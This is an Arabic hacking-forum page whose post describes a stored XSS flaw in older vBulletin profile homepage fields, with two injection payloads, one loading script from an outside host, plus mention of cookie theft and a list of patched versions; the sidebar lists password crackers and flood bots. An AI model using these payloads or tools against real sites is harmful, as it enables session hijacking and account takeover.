منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
مرحبا بكم في منتدىات القناص ابوهاجوس لهكر النيمبوز وبرامج الاختراق
aboohagos@nimbuzz.com
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
مرحبا بكم في منتدىات القناص ابوهاجوس لهكر النيمبوز وبرامج الاختراق
aboohagos@nimbuzz.com
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق

(aboohagos@nimbuzz.com)على من سجل ولم يستطيع الدخول ان ينتظر لين اقوم بتنشيط حسابه(aboohagos@nimbuzz.com)
 
الرئيسيةأحدث الصورالتسجيلدخول
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
code Facebook mini تخمين source
المواضيع الأخيرة
» مشروع بوت يحتوي على فيسات النيم الاصليه Source code bot aboohagos@nimbuzz.com
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالخميس فبراير 11, 2021 9:49 am من طرف ابوهاجوس

» مشروع بان بوت مع الرسايل التلقايى+التحدث مع مضافينك لغة Visual Basic 2010
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالخميس فبراير 11, 2021 9:48 am من طرف ابوهاجوس

» Compression(Visual Basic 2008)
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالخميس فبراير 11, 2021 9:47 am من طرف ابوهاجوس

» مشروع بان بوت ترحيب
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالخميس فبراير 11, 2021 9:46 am من طرف ابوهاجوس

» مشروع مخمن الباس بلغة Visual Basic 2010
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأحد نوفمبر 08, 2020 7:59 am من طرف kimo.herolove1

» مشروع فلود اضافات ب نكات بلغة Visual C# 2010
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأحد نوفمبر 08, 2020 7:03 am من طرف kimo.herolove1

» Reflector لفك البرامج المصنوعه بالفجول بيسك دوت نت
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأحد نوفمبر 08, 2020 6:54 am من طرف kimo.herolove1

» Source Code DrawingAttributes (abohagooss)( Visual Basic 2008)
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأربعاء سبتمبر 02, 2020 2:28 pm من طرف kimo.herolove1

» مشروع التحكم في الديسك توب
 ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأربعاء سبتمبر 02, 2020 2:27 pm من طرف kimo.herolove1

نوفمبر 2024
الأحدالإثنينالثلاثاءالأربعاءالخميسالجمعةالسبت
     12
3456789
10111213141516
17181920212223
24252627282930
اليوميةاليومية
كل ماتطلبوه موجود
كل جديد وحصريا موجود لدينا
اي استفسار ضيف اميلاتي
aboohagos@nimbuzz.com
aboohagos@nimbuzz.com
أفضل 10 أعضاء في هذا المنتدى
Admin
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
ابوهاجوس
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
هكراووي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
صدام الشرعبي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
kimo.herolove
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
majed5160
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
jemlove
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
brainiac123
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
zezozezoalhlo
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
kimo.herolove1
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
أفضل 10 فاتحي مواضيع
Admin
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
ابوهاجوس
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
هكراووي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
صدام الشرعبي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
المتنبي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
عآزف$اوتار$الحزن
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
ghazi
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
حسينم
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
وليدالعراقي
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
alzeer-libya
 ثغرة XSS في منتديات vBulletin 3.8.4 I_vote_rcap ثغرة XSS في منتديات vBulletin 3.8.4 Empty ثغرة XSS في منتديات vBulletin 3.8.4 Empty 
ازرار التصفُّح
 البوابة
 الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
المواضيع الأكثر نشاطاً
الاصدار الرابع من برنامج التخمين بتاريخ11-5-2013
مشروع مخمن الباس بلغة Visual Basic 2010
Source Code Flood Room_aboohagos@nimbuzz.com.rar تم التعديل على مشروع فلود روم يقوم بفصل المستخدمين لغة (Visual Basic 2008)
تم تحديث صانع النكات واضافة قسم لتغير كلمة المرور بتاريخ31-5-2013
مشروع صانع نكات الفلود Source Code-ID Maker -
مشروع بان بوت مع الرسايل التلقايى+التحدث مع مضافينك لغة Visual Basic 2010
Source Code Bot contest for Roman-aboohagos@nimbuzz.com مشروع بوت ابوهاجوس المتكامل
مشروع تخمين النكات شغال Source Code Cracker_ abohagooss@nimbuzz.com
استرجاع النكات المسروقة+والمحروقه بتاريخ5-6-2013
اخطر برنامج فلود في تاريخ النيمبوز فلود روم+خاص+اضافات بتاريخ26-4-2013

 

  ثغرة XSS في منتديات vBulletin 3.8.4

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin


عدد المساهمات : 2035
نقاط : 5633
السٌّمعَة : 11
تاريخ التسجيل : 16/05/2012
العمر : 38

 ثغرة XSS في منتديات vBulletin 3.8.4 Empty
مُساهمةموضوع: ثغرة XSS في منتديات vBulletin 3.8.4    ثغرة XSS في منتديات vBulletin 3.8.4 Emptyالأربعاء يونيو 27, 2012 6:51 pm



أطلقت شركة Jelsoft تحديثات لعدّة اصدارات من سكريبت المنتديات vBulletin وذلك لوجود ثغرة XSS اكتشفت مؤخّراً في صفحة الملف الشخصي وأصابت الاصدارات 3.8.4 , 3.7.6 و 3.6.12 حيث يستغل المهاجم خطأ في طريقة تحقق سكريبت vB من حقل "الصفحة الشخصية" بشكل صحيح مما يمكّنه من زرع كود Javascript مكان رابط الصفحة الشخصيّة.





في الملف الشخصي يستطيع الأعضاء وضع رابط للصفحة الشخصيّة, يتأكد سكريبت vBulletin من وجود www في الرابط الذي وضعه المستخدم أو عن طريق Regex يتحقق من مدخلات المستخدم (الأحرف a-z , الأرقام 1-9 بالاضافة لوجود ://).

بهذه الحالة يستطيع المهاجم وضع الكود التالي في حقل الصفحة الشخصية:

javascript://%0a********.write('***************(0)</script>')
مما يؤدي لظهور نافذة تحتوي على الرقم 0 وهذا يدل على تشغيل كود الجافاسكريبت أو يقوم المهاجم بوضع الكود التالي:

javascript://%0a********.write('<script src=http://intern0t.net/.k></script>')
لتحويل المستخدمين لموقع آخر بشكل تلقائي (من المحتمل تطوير الاستغلال السابق ليعمل على سرقة الكوكيز الخاصّة بالمستخدم أو مدير المنتدى وارسالها الى المهاجم وهذا يمكّنه من الدخول الى المنتدى باسم المستخدم أو مدير المنتدى دون الحاجة لمعرفة كلمة مرور).

شركة جيل سوفت أطلقت الاصدارات التالية لاصلاح الثغرة السابقة:

vBulletin 3.8.4 PL1
vBulletin 3.7.6 PL1
vBulletin 3.6.12 PL2


نحن ننصح الجميع بالتحديث بأسرع وقت ممكن عن طريق تحميل الرقع الأمنية من صفحة المشتركين في موقع vBulletin مع ملاحظة أنك ستحتاج الى رخصة فعّالة لتتمكّن من دخول منطقة المشتركين وتحميل الرقع الأمنيّة السابقة.

الجدير بالذكر أن استغلال هذه الثغرة انتشر بعد أن أطلقت شركة Jelsoft الاصدارات المحدثّة (مكتشف الاستغلال قارن الملفّات قبل وبعد التحديث ثم استنتج مكان وجود الثغرة).
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://alqhas.yoo7.com
 
ثغرة XSS في منتديات vBulletin 3.8.4
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  ثغرة جديده { SocialEngine 4.2.2 Multiple Vulnerabilities }
»  ثغرة تستطيع القول سهلة (تظهرلك الباسورد)
»  ثغرة في سكربت الوجيز ( Alwjees )
»  ثغرة عجيبة جداً توصلك الى Phpmyadmin
»  ثغرة لمشاهدة كامرات المراقبة في العالم

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات القناص ابوهاجوس لهكرالنيمبوز وبرامج الاختراق :: منتدى الاختراق العام :: قسم الاختراق العام :: لقسم يعالج الثغرات بجميع أنواعها ويحوي شروحات عن كيفية أكتشاف الثغرات وأستغلالها-
انتقل الى: